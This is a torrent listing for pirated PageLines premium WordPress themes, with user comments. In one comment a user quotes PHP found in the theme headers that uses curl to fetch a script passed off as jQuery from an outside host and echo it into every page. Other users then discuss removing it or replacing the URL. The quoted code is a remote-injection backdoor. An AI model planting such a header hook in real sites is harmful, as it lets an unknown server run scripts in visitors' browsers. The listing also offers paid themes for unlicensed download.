PageLines (ALL 4 THEMES + PlatformPro) - Premium Wordpress Them
- Type:
- Other > Other
- Files:
- 2179
- Size:
- 70.51 MiB (73929897 Bytes)
- Tag(s):
- wordpress wordpress themes premium wordpress themes free wordpress themes download wordpress themes free wordpress themes torrent pagelines iblogpro whitehousepro ecopro stationpro platformpro pagelin
- Uploaded:
- 2011-12-03 22:45:34 GMT
- By:
- Anonymous
- Seeders:
- 0
- Leechers:
- 1
- Comments
- 10
- Info Hash: FD29CCD4F7B7AD63534BA868F0550A42B0A3D9A4
(Problems with magnets links are fixed by upgrading your torrent client!)
PageLines - Premium Wordpress Themes WordPress Themes for Professional Websites THIS TORRENT INCLUDES ALL 4 PAGELINES PREMIUM WORDPRESS THEMES AND PLATFORMPRO: 1.) PlatformPro (95 US DOLLARS) 2.) iBlogPro4 (79 US DOLLARS) 3.) WhiteHousePro3 (79 US DOLLARS) 4.) EcoPro (79 US DOLLARS) 5.) StationPro3 (79 US DOLLARS)
File list not available. |
This is a great one. Thanks!
This has malicious code installed in all of the headers, disguised as the jquery link:
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
tx for warning --> jbbrwcky
Is it necessary to take out this code? Are these torrents then right?
yes, take out the code. The theme should still work assuming you replace the url with a valid one. I'm guessing a jquery URL, just goto find out what the link is... It will be apart of jquery API I'm guessing. But then I'm still pretty new to wordpress.
I was reading that wrong earlier. Basically all the function is doing is checking if the class (curl_init) is available and if it is then it executes the javascript. This MAY have been part of the "font replacement" function calls but no way to tell without the original. Just delete the whole function. line 50-60~ and hope it doesn't break the fonts selection part of theme or something more drastic.
One more comment, This doesn't actually contain all the themes, it only contains 1 just styled a few different ways and named appropriately. The only actual theme in this is Whitehouse3. I just fixed all themes and uploaded them all, but they all say the same thing... look the same, with slight css variations. I really wish someone would upload these and other premium themes. Preferably someone who isn't an "anonymous" trying to inject malware.... DONT SEED!
The function only downloads (from another server) and prints the jquery script. If it's malicious or not you can replace with the url of your self-hosted jquery file or use the google hosted file http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js (as 1.6.3 is what's used in the code, but you can try with the last version 1.8.0)
where do we find the header that contain this malicious link? please help cause i got and error message on my page already!
Ooops i find it and you can just replace it with http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js it will work perfectly then after!
Comments